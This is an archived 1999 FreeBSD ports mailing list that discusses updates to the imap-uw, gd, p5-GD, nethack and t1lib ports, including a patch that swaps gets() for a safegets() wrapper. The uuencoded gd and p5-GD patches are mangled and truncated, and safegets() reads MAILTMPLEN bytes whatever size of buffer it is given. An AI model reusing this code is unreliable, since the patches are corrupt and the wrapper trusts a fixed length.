Content-Transfer-Encoding: 7bit diff -ruN imap-uw.old/Makefile imap-uw/Makefile --- imap-uw.old/Makefile Sun Sep 19 02:29:19 1999 +++ imap-uw/Makefile Mon Dec 13 01:00:37 1999 @@ -1,16 +1,17 @@ # New ports collection makefile for: imap-uw -# Version required: 4.5 +# Version required: 4.6 # Date created: 9 Jan 1997 # Whom: pst # # $FreeBSD: ports/mail/imap-uw/Makefile,v 1.30 1999/09/18 17:29:19 steve Exp $ # -DISTNAME= imap-4.5 -PKGNAME= imap-uw-4.5 +DISTNAME= imap-4.6 +PKGNAME= imap-uw-4.6 CATEGORIES= mail MASTER_SITES= ftp://ftp.cac.washington.edu/imap/old/ \ ftp://ftp.funet.fi/pub/mirrors/ftp.cac.washington.edu/mail/old/ \ + http://mirror.nucba.ac.jp/mirror/imap/old/ \ ftp://ftp.uni-halle.de/pub/mail/pine/ EXTRACT_SUFX= .tar.Z @@ -36,6 +37,9 @@ post-configure: @${ECHO_MSG} ">> The c-client shared library will be named ${SHLIBNAME}" +post-patch: + @${CP} ${FILESDIR}/safegets.[ch] ${WRKSRC}/src/mtest/ + do-install: ${INSTALL_DATA} ${WRKSRC}/c-client/mail.h ${PREFIX}/include ${INSTALL_DATA} ${WRKSRC}/c-client/rfc822.h ${PREFIX}/include @@ -53,6 +57,8 @@ ${WRKSRC}/src/imapd/imapd.8c ${PREFIX}/man/man8/imapd.8 ${INSTALL_MAN} \ ${WRKSRC}/src/ipopd/ipopd.8c ${PREFIX}/man/man8/ipopd.8 + + @${CAT} ${PKGMESSAGE} post-install: ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib diff -ruN imap-uw.old/files/md5 imap-uw/files/md5 --- imap-uw.old/files/md5 Mon Mar 15 10:38:38 1999 +++ imap-uw/files/md5 Mon Dec 13 00:47:05 1999 @@ -1,2 +1 @@ -MD5 (imap-4.5.tar.Z) = 24e5ff01e0f14ecc647f10a9148a9dbd -SIZE (imap-4.5.tar.Z) = 1656569 +MD5 (imap-4.6.tar.Z) = d5d7e5ebbdace57eed7706d4fd2ffc09 diff -ruN imap-uw.old/files/safegets.c imap-uw/files/safegets.c --- imap-uw.old/files/safegets.c Thu Jan 1 09:00:00 1970 +++ imap-uw/files/safegets.c Mon Dec 13 00:47:05 1999 @@ -0,0 +1,19 @@ +#include +#include +#include "mail.h" /* MAILTMPLEN */ + +static char buf[MAILTMPLEN]; + +char *safegets(char *buf) { + char *p; + + if (!fgets(buf, MAILTMPLEN, stdin)) { + return NULL; + } + + if (NULL != (p = strchr(buf, '\n'))) { + *p = '\0'; + } + + return buf; +} diff -ruN imap-uw.old/files/safegets.h imap-uw/files/safegets.h --- imap-uw.old/files/safegets.h Thu Jan 1 09:00:00 1970 +++ imap-uw/files/safegets.h Mon Dec 13 00:47:05 1999 @@ -0,0 +1 @@ +char *safegets(char *buf); diff -ruN imap-uw.old/patches/patch-ab imap-uw/patches/patch-ab --- imap-uw.old/patches/patch-ab Tue May 4 23:41:36 1999 +++ imap-uw/patches/patch-ab Mon Dec 13 00:47:05 1999 @@ -1,6 +1,6 @@ ---- src/osdep/unix/Makefile.orig Wed Jan 27 01:17:39 1999 -+++ src/osdep/unix/Makefile Sat Feb 27 17:16:00 1999 -@@ -100,7 +100,7 @@ +--- src/osdep/unix/Makefile.orig Thu Sep 30 14:52:54 1999 ++++ src/osdep/unix/Makefile Mon Oct 25 16:49:02 1999 +@@ -104,7 +104,7 @@ dummy.o pseudo.o netmsg.o flstring.o fdstring.o \ rfc822.o nntp.o smtp.o imap4r1.o pop3.o \ unix.o mbox.o mbx.o mmdf.o tenex.o mtx.o news.o phile.o mh.o mx.o @@ -9,8 +9,8 @@ MAKE=make MV=mv RM=rm -rf -@@ -115,6 +115,10 @@ - PASSWDTYPE=$(PASSWDTYPE) +@@ -119,6 +119,10 @@ + PASSWDTYPE=$(PASSWDTYPE) SPECIALAUTHENTICATORS="$(SPECIALAUTHENTICATORS)" BUILD=$(MAKE) build $(BUILDOPTIONS) +# Need this for the shared library rule to work correctly @@ -20,16 +20,23 @@ # Here if no make argument established missing: osdep.h -@@ -190,7 +194,7 @@ +@@ -191,11 +195,13 @@ + + bsf: # FreeBSD + $(BUILD) `cat EXTRASPECIALS` OS=bsi SIGTYPE=psx \ ++ CHECKPW=pam \ SPOOLDIR=/var \ ACTIVEFILE=/usr/local/news/lib/active \ RSHPATH=/usr/bin/rsh \ - BASECFLAGS="-g -O -pipe -DNFSKLUDGE" \ +- BASELDFLAGS="-lcrypt" ++ LOCKPGM=/etc/mlock \ + BASECFLAGS="-DNFSKLUDGE -DIGNORE_LOCK_EACCES_ERRORS" \ - BASELDFLAGS="-lcrypt" ++ BASELDFLAGS="-lpam -lcrypt" bsi: # BSD/i386 -@@ -606,19 +610,31 @@ + $(BUILD) `cat EXTRASPECIALS` OS=$@ \ +@@ -620,19 +626,31 @@ # Build it! @@ -63,7 +70,7 @@ # Dependencies -@@ -652,7 +668,7 @@ +@@ -666,7 +684,7 @@ # OS-dependent @@ -72,7 +79,7 @@ osdep.h env_unix.h tcp_unix.h \ osdep.c env_unix.c fs_unix.c ftl_unix.c nl_unix.c tcp_unix.c \ auths.c flock.c flockbsd.c flcksafe.c fsync.c gethstid.c \ -@@ -664,7 +680,12 @@ +@@ -678,7 +696,12 @@ write.c \ strerror.c strpbrk.c strstr.c strtok.c strtoul.c \ OSCFLAGS diff -ruN imap-uw.old/patches/patch-ac imap-uw/patches/patch-ac --- imap-uw.old/patches/patch-ac Mon Mar 15 10:38:38 1999 +++ imap-uw/patches/patch-ac Mon Dec 13 00:47:05 1999 @@ -1,5 +1,5 @@ ---- src/imapd/Makefile.orig Sat Nov 21 05:26:03 1998 -+++ src/imapd/Makefile Sat Feb 27 17:19:33 1999 +--- src/imapd/Makefile.orig Tue Oct 5 15:13:35 1999 ++++ src/imapd/Makefile Sat Oct 16 03:17:51 1999 @@ -31,9 +31,9 @@ # WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. @@ -12,10 +12,10 @@ SHELL= /bin/sh # The "Manage Mail" menu item of Netscape Messager puts up an error message -@@ -56,7 +56,7 @@ - CC = `cat $C/CCTYPE` +@@ -59,7 +59,7 @@ CFLAGS = -I$C `cat $C/CFLAGS` $(EXTRACFLAGS) -DANOFILE=\"$(ANO)\" \ - -DALERTFILE=\"$(ALERT)\" -DUSERALERTFILE=\"$(USERALERT)\" + -DALERTFILE=\"$(ALERT)\" -DUSERALERTFILE=\"$(USERALERT)\" \ + -DWEBEXPRESS_BRAIN_DAMAGE=1 -LDFLAGS = $(CCLIENTLIB) `cat $C/LDFLAGS` +LDFLAGS = -L$C -l$(SHLIBBASE) `cat $C/LDFLAGS` @@ -31,15 +31,4 @@ +LDFLAGS = -L$C -l$(SHLIBBASE) `cat $C/LDFLAGS` ipopd: ipop2d ipop3d - ---- src/mtest/Makefile.orig Wed Apr 15 01:42:04 1998 -+++ src/mtest/Makefile Sat Oct 10 21:48:18 1998 -@@ -39,7 +39,7 @@ - - CC = `cat $C/CCTYPE` - CFLAGS = -I$C `cat $C/CFLAGS` --LDFLAGS = $(CCLIENTLIB) `cat $C/LDFLAGS` -+LDFLAGS = -L$C -l$(SHLIBBASE) `cat $C/LDFLAGS` - - all: mtest diff -ruN imap-uw.old/patches/patch-ad imap-uw/patches/patch-ad --- imap-uw.old/patches/patch-ad Thu Jan 1 09:00:00 1970 +++ imap-uw/patches/patch-ad Mon Dec 13 00:47:05 1999 @@ -0,0 +1,22 @@ +--- src/mtest/Makefile.orig Wed Apr 15 07:42:04 1998 ++++ src/mtest/Makefile Mon Oct 25 21:37:51 1999 +@@ -39,14 +39,16 @@ + + CC = `cat $C/CCTYPE` + CFLAGS = -I$C `cat $C/CFLAGS` +-LDFLAGS = $(CCLIENTLIB) `cat $C/LDFLAGS` ++LDFLAGS = -L$C -l$(SHLIBBASE) `cat $C/LDFLAGS` + + all: mtest + +-mtest: $(CCLIENTLIB) mtest.o +- $(CC) $(CFLAGS) -o mtest mtest.o $(LDFLAGS) ++mtest: $(CCLIENTLIB) mtest.o safegets.o ++ $(CC) $(CFLAGS) -o mtest mtest.o safegets.o $(LDFLAGS) + + mtest.o: $C/mail.h $C/misc.h $C/osdep.h $C/rfc822.h $C/smtp.h $C/nntp.h ++ ++safegets.o: $C/mail.h + + $(CCLIENTLIB): + cd $C;make diff -ruN imap-uw.old/patches/patch-ae imap-uw/patches/patch-ae --- imap-uw.old/patches/patch-ae Thu Jan 1 09:00:00 1970 +++ imap-uw/patches/patch-ae Mon Dec 13 00:47:05 1999 @@ -0,0 +1,28 @@ +--- src/mtest/mtest.c.orig Sat May 29 14:07:06 1999 ++++ src/mtest/mtest.c Mon Oct 25 21:36:50 1999 +@@ -49,6 +49,7 @@ + #include "rfc822.h" + #include "smtp.h" + #include "nntp.h" ++#include "safegets.h" + + /* Excellent reasons to hate ifdefs, and why my real code never uses them */ + +@@ -528,7 +529,7 @@ + void prompt (char *msg,char *txt) + { + printf ("%s",msg); +- gets (txt); ++ safegets (txt); + } + + /* Interfaces to C-client */ +@@ -713,7 +714,7 @@ + puts (" Msg (end with a line with only a '.'):"); + body->type = TYPETEXT; + *text = '\0'; +- while (gets (line)) { ++ while (safegets (line)) { + if (line[0] == '.') { + if (line[1] == '\0') break; + else strcat (text,"."); diff -ruN imap-uw.old/pkg/DESCR imap-uw/pkg/DESCR --- imap-uw.old/pkg/DESCR Sun Nov 22 05:01:56 1998 +++ imap-uw/pkg/DESCR Mon Dec 13 00:47:05 1999 @@ -12,9 +12,9 @@ pop3 stream tcp nowait root /usr/local/libexec/ipop3d ipop3d imap4 stream tcp nowait root /usr/local/libexec/imapd imapd -You may also have to edit your /etc/services (or Yellow Pages, -NetInfo, etc. equivalent) to register these services, such as: +and /etc/pam.conf file with lines such as: -pop 109/tcp -pop3 110/tcp -imap4 143/tcp [imap2 and imap4 share the same port again] +imap auth required pam_unix.so try_first_pass +imap account required pam_unix.so try_first_pass +pop auth required pam_unix.so try_first_pass +pop account required pam_unix.so try_first_pass diff -ruN imap-uw.old/pkg/MESSAGE imap-uw/pkg/MESSAGE --- imap-uw.old/pkg/MESSAGE Thu Jan 1 09:00:00 1970 +++ imap-uw/pkg/MESSAGE Mon Dec 13 00:47:05 1999 @@ -0,0 +1,9 @@ +### +As of imap-uw 4.6 and later, you need to edit /etc/pam.conf to add support +for IMAP/POP. To do so, add the following four lines to this file: + +imap auth required pam_unix.so try_first_pass +imap account required pam_unix.so try_first_pass +pop auth required pam_unix.so try_first_pass +pop account required pam_unix.so try_first_pass +### --Multipart_Mon_Dec_13_01:31:50_1999-1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 8:44:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id 8680814D4E for ; Sun, 12 Dec 1999 08:44:20 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id KAA23768; Sun, 12 Dec 1999 10:44:05 -0600 (CST) Date: Sun, 12 Dec 1999 10:44:05 -0600 (CST) From: Steve Price To: Akinori MUSHA aka knu Cc: ady@warpnet.ro, freebsd-ports@freebsd.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: <86g0x85de1.wl@localhost.local.idaemons.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This patch doesn't apply cleanly to the current port. Can you send me (no need to send it to the list) a uuencoded diff against what we currently have in the ports tree? Thanks. -steve On Mon, 13 Dec 1999, Akinori MUSHA aka knu wrote: # I could test my patch on the latest -CURRENT to see there's no # problem. Of course I also tested it on the latest -STABLE (-RC) and # everything seems very good. # # I attached a new patch which should supersede all that I sent # previously. Steve, please commit it after the unfreeze. Thanks. # # -- # / # /__ __ # / ) ) ) ) / http://www.idaemons.org/knu/ # Akinori MUSHA aka / (_ / ( (__( mailto:knu@idaemons.org # # "We are but hungry.. Associated Ita-meshi Daemons!" # http://www.idaemons.org/ # To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 9: 0: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 15C9D14C30 for ; Sun, 12 Dec 1999 09:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA24300; Sun, 12 Dec 1999 09:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C1AA114F2B; Sun, 12 Dec 1999 08:54:33 -0800 (PST) Message-Id: <19991212165433.C1AA114F2B@hub.freebsd.org> Date: Sun, 12 Dec 1999 08:54:33 -0800 (PST) From: igor@zynaps.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15437: update graphics/gd port to support ttf and xpm Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15437 >Category: ports >Synopsis: update graphics/gd port to support ttf and xpm >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 09:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Igor Vinokurov >Release: 3.3-19991205-STABLE >Organization: Russian Trading System >Environment: FreeBSD darwin.rtsnet.ru 3.3-19991205-STABLE FreeBSD 3.3-19991205-STABLE #1: Tue Dec 7 18:51:14 MSK 1999 root@darwin.rtsnet.ru:/usr/src/sys/compile/DARWIN i386 >Description: gd compiled from ports collection does not support ttf and xpm (original version do) >How-To-Repeat: >Fix: Use this patch. begin 644 gd-port.patch M9&EF9B`MU!/4E131$E2?2]GU!/4E131$E2?2]GU!/4E131$E2?2]P7!E(&%N M9"]O7!E(&%N9"]OB`M;'1T9B`M;%AP;2`M;%@Q,0HK*TQ)0E,]+6QM("UL9V0@+6QP;F<@ M+6QZ("UL='1F("UL6'!M("UL6#$Q"B`@"B`@(U1Y<&EC86P@:6YS=&%L;"!L M;V-A=&EO;G,@9F]R(&9R965T>7!E+"!Z;&EB+"!X<&T@86YD(&QI8G!N9R!H M96%D97(@9FEL97,N"B`@(TEF('EO=7)S(&%R92!S;VUE=VAE6]U2!E;'-E=VAE6]U7-T96T@8V%N)W0@8V%URelease-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 9:20: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6549D14D82 for ; Sun, 12 Dec 1999 09:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA25684; Sun, 12 Dec 1999 09:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id EAD7E14CE5; Sun, 12 Dec 1999 09:12:51 -0800 (PST) Message-Id: <19991212171251.EAD7E14CE5@hub.freebsd.org> Date: Sun, 12 Dec 1999 09:12:51 -0800 (PST) From: igor@zynaps.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15438: p5-GD port update (1.18 -> 1.23) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15438 >Category: ports >Synopsis: p5-GD port update (1.18 -> 1.23) >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 09:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Igor Vinokurov >Release: 3.3-19991205-STABLE >Organization: Russian Trading System >Environment: FreeBSD darwin.rtsnet.ru 3.3-19991205-STABLE FreeBSD 3.3-19991205-STABLE #1: Tue Dec 7 18:51:14 MSK 1999 root@darwin.rtsnet.ru:/usr/src/sys/compile/DARWIN i386 >Description: >How-To-Repeat: >Fix: begin 644 p5-GD-port.patch M9&EF9B`MBD@/2`X-C$U8V5F9#DP8S=C.3BD@/2`X.#9D9F%C865C,3@S-V,P-69F9#)D-C'1R87-E87)C:"`]('%W M*"`M3"]U2!` M97AT'1R86QI8G,["BLM<'5S:"!`97ATB'1R86QI8G,L0&5X=')ARelease-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 9:27:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from relay.rtsnet.ru (bravo.rtsnet.ru [194.247.132.8]) by hub.freebsd.org (Postfix) with ESMTP id 5F59B15095; Sun, 12 Dec 1999 09:27:36 -0800 (PST) (envelope-from igor@rtsnet.ru) Received: from shogun.rtsnet.ru (shogun.rtsnet.ru [172.16.4.32]) by relay.rtsnet.ru (Postfix) with ESMTP id 83348198C3E; Sun, 12 Dec 1999 20:27:31 +0300 (MSK) Received: (from igor@localhost) by shogun.rtsnet.ru (8.9.3/8.9.3/Zynaps) id UAA05117; Sun, 12 Dec 1999 20:27:33 +0300 (MSK) Date: Sun, 12 Dec 1999 20:27:33 +0300 From: Igor Vinokurov To: jfitz@FreeBSD.org Cc: ports@FreeBSD.org Subject: update for graphics/gd and graphics/p5-GD ports Message-ID: <19991212202733.A5050@shogun.rtsnet.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I just submit patches to update graphics/gd and graphics/p5-GD ports. http://www.freebsd.org/cgi/query-pr.cgi?pr=ports%2F15437 http://www.freebsd.org/cgi/query-pr.cgi?pr=ports%2F15438 Feel free for use it if you consider it usefull. -- Igor Vinokurov To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 9:49:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ms.tokyo.jcom.ne.jp (ms.tokyo.jcom.ne.jp [210.234.123.18]) by hub.freebsd.org (Postfix) with ESMTP id 1AB91150E9 for ; Sun, 12 Dec 1999 09:49:19 -0800 (PST) (envelope-from musha@ms.tokyo.jcom.ne.jp) Received: from daemon.local.idaemons.org (pc343031.tokyo.jcom.ne.jp [203.140.143.31]) by ms.tokyo.jcom.ne.jp (8.9.1/3.7W 06/01/99) with ESMTP id CAA18396; Mon, 13 Dec 1999 02:48:37 +0900 (JST) Received: by daemon.local.idaemons.org (8.9.3/3.7W) id CAA67358; Mon, 13 Dec 1999 02:48:06 +0900 (JST) Date: Mon, 13 Dec 1999 02:48:05 +0900 Message-ID: <86d7sc59uy.wl@localhost.local.idaemons.org> From: Akinori MUSHA aka knu To: ady@warpnet.ro, freebsd-ports@freebsd.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: In your message of "Sat, 11 Dec 1999 18:10:07 +0200 (EET)" References: <86d7sd1o7d.wl@localhost.local.idaemons.org> User-Agent: Wanderlust/2.2.12 (Joyride) SEMI/1.13.7 (Awazu) PGPGPG FLIM/1.13.2 (Kasanui) MULE XEmacs/21.1 (patch 8) (Bryce Canyon) (i386--freebsd) Organization: A.I.D. MIME-Version: 1.0 (generated by SEMI 1.13.7 - "Awazu") Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, At Sat, 11 Dec 1999 18:10:07 +0200 (EET), Adrian Penisoara wrote: > What bothers me is that I never found time to work on this; you're > welcome to take maintainership of the port if you feel (and it seems you > are) better suited to maintain it! > > It's just that I would like you to take the good ideeas that I and my > predecesors have put in -- like shared library building & versioning and > preparing a strategy for separating the c-client library from Pine & > imap/pop daemons (did you notice that both Pine & imap-uw compile the same > library sources ?)... Yes, and I've been trying to port imap-utils which also use the c-client library. Actually I've already had them work with the shlib, but now having a problem that they always try to connect to servers via rsh... I'm analyzing it. > So, if you feel like jumpin' in the maintainer "business" just step > forward ;-) ! Well, I know you are a pine user but I'm not, and no doubt you are the one who should maintain pine & imap-uw simultaneously. I just worried about your load. Anyway, I'd like to work with you. I'd appreciate it if you could give me some advice about my future work. Thanks. -- / /__ __ / ) ) ) ) / http://www.idaemons.org/knu/ Akinori MUSHA aka / (_ / ( (__( mailto:knu@idaemons.org "We are but hungry.. Associated Ita-meshi Daemons!" http://www.idaemons.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 14:50: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B9FF14E74 for ; Sun, 12 Dec 1999 14:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA47521; Sun, 12 Dec 1999 14:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id DC36614E73 for ; Sun, 12 Dec 1999 14:47:04 -0800 (PST) (envelope-from dscheidt@shell-3.enteract.com) Received: from shell-3.enteract.com (dscheidt@shell-3.enteract.com [207.229.143.42]) by mail.enteract.com (8.9.3/8.9.3) with ESMTP id QAA81503 for ; Sun, 12 Dec 1999 16:46:58 -0600 (CST) (envelope-from dscheidt@shell-3.enteract.com) Received: (from dscheidt@localhost) by shell-3.enteract.com (8.9.3/8.9.3) id QAA45895; Sun, 12 Dec 1999 16:46:58 -0600 (CST) (envelope-from dscheidt) Message-Id: <199912122246.QAA45895@shell-3.enteract.com> Date: Sun, 12 Dec 1999 16:46:58 -0600 (CST) From: dscheidt@enteract.com Reply-To: dscheidt@enteract.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15442: Patch for ports/games/nethack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15442 >Category: ports >Synopsis: upgrade of nethack port to 3.2.3, which has y2k patches, >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 14:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: David Scheidt >Release: FreeBSD 3.3-STABLE i386 >Organization: random FreeBSD adventure game players >Environment: >Description: nethack 3.2.2 has a y2k bug in its save game format. Dates are saved with two digit years. Bad things happen if you append to the save file following 1 jan 2000. >How-To-Repeat: >Fix: Apply this patch: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/games/nethack/Makefile,v retrieving revision 1.22 diff -u -r1.22 Makefile --- Makefile 1999/08/31 06:44:17 1.22 +++ Makefile 1999/12/12 22:35:38 @@ -16,6 +16,8 @@ LIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm +PATCHFILES= nh-3.2.2-3.2.3.diff +PATCH_SITES= ftp://ftp.nethack.org/pub/nethack/oldver/3.2.3/src/ USE_GMAKE= yes MAN6= dgn_comp.6 dlb.6 lev_comp.6 nethack.6 recover.6 Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/games/nethack/files/md5,v retrieving revision 1.4 diff -u -r1.4 md5 --- md5 1996/12/23 02:29:36 1.4 +++ md5 1999/12/12 22:36:42 @@ -1 +1,2 @@ MD5 (nethack-3.2.2.tar.gz) = c85de4d14453b3a2d182d1dfc2ca04df +MD5 (nh-3.2.2-3.2.3.diff) = 440141990df326d5a973d890179cffae >Release-Note: >Audit-Trail: >Unformatted: plus bug fixes To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 15:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 82AC514DD8 for ; Sun, 12 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA49522; Sun, 12 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 15:20:02 -0800 (PST) Message-Id: <199912122320.PAA49522@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Brian Handy Subject: Re: ports/15442: Patch for ports/games/nethack Reply-To: Brian Handy Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15442; it has been noted by GNATS. From: Brian Handy To: dscheidt@enteract.com Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15442: Patch for ports/games/nethack Date: Sun, 12 Dec 1999 16:11:33 -0700 (MST) >>Number: 15442 >>Category: ports >>Synopsis: upgrade of nethack port to 3.2.3, which has y2k patches, 3.3.0 was just released, it was announced on slashdot. I tried upgrading the port to that, but the compile crash-landed and I don't yet understand why...something funny in the tty/termcap stuff. Probably pilot error on my part, but probably worth upgrading all the way to 3.3.0 once someone figures it out. Regards, Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 16:20: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 79B1E14D39 for ; Sun, 12 Dec 1999 16:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA53970; Sun, 12 Dec 1999 16:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 16:20:02 -0800 (PST) Message-Id: <199912130020.QAA53970@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: David Scheidt Subject: Re: ports/15442: Patch for ports/games/nethack Reply-To: David Scheidt Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15442; it has been noted by GNATS. From: David Scheidt To: Brian Handy Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15442: Patch for ports/games/nethack Date: Sun, 12 Dec 1999 18:11:34 -0600 (CST) On Sun, 12 Dec 1999, Brian Handy wrote: > >>Number: 15442 > >>Category: ports > >>Synopsis: upgrade of nethack port to 3.2.3, which has y2k patches, > > 3.3.0 was just released, it was announced on slashdot. I tried upgrading > the port to that, but the compile crash-landed and I don't yet understand > why...something funny in the tty/termcap stuff. Probably pilot error on > my part, but probably worth upgrading all the way to 3.3.0 once someone > figures it out. 3.3.0 has a bunch of changes to it. They have seperated out character class from race, for instance. The net effect is that the saved-game files are not compatible. So I think there needs to be both a 3.2.3 and 3.3.0 version. I'll take a look at 3.3.0, and seee if I can get it built. David Scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 16:20: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CC81514EA1 for ; Sun, 12 Dec 1999 16:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA53979; Sun, 12 Dec 1999 16:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 1FBCA14D2B; Sun, 12 Dec 1999 16:16:43 -0800 (PST) Message-Id: <19991213001643.1FBCA14D2B@hub.freebsd.org> Date: Sun, 12 Dec 1999 16:16:43 -0800 (PST) From: lioux@linf.unb.br To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15443: Updated port: devel/t1lib from 0.9.2 to 1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15443 >Category: ports >Synopsis: Updated port: devel/t1lib from 0.9.2 to 1.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 16:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mario Sergio Fujikawa Ferreira >Release: FreeBSD 3.4-RC >Organization: >Environment: >Description: Just a version update form 0.9.2 to 1.0. >How-To-Repeat: Just compile >Fix: diff -ruN /usr/ports/devel/t1lib/Makefile t1lib/Makefile --- /usr/ports/devel/t1lib/Makefile Sun Oct 31 23:16:29 1999 +++ t1lib/Makefile Sun Dec 12 20:27:03 1999 @@ -6,14 +6,14 @@ # 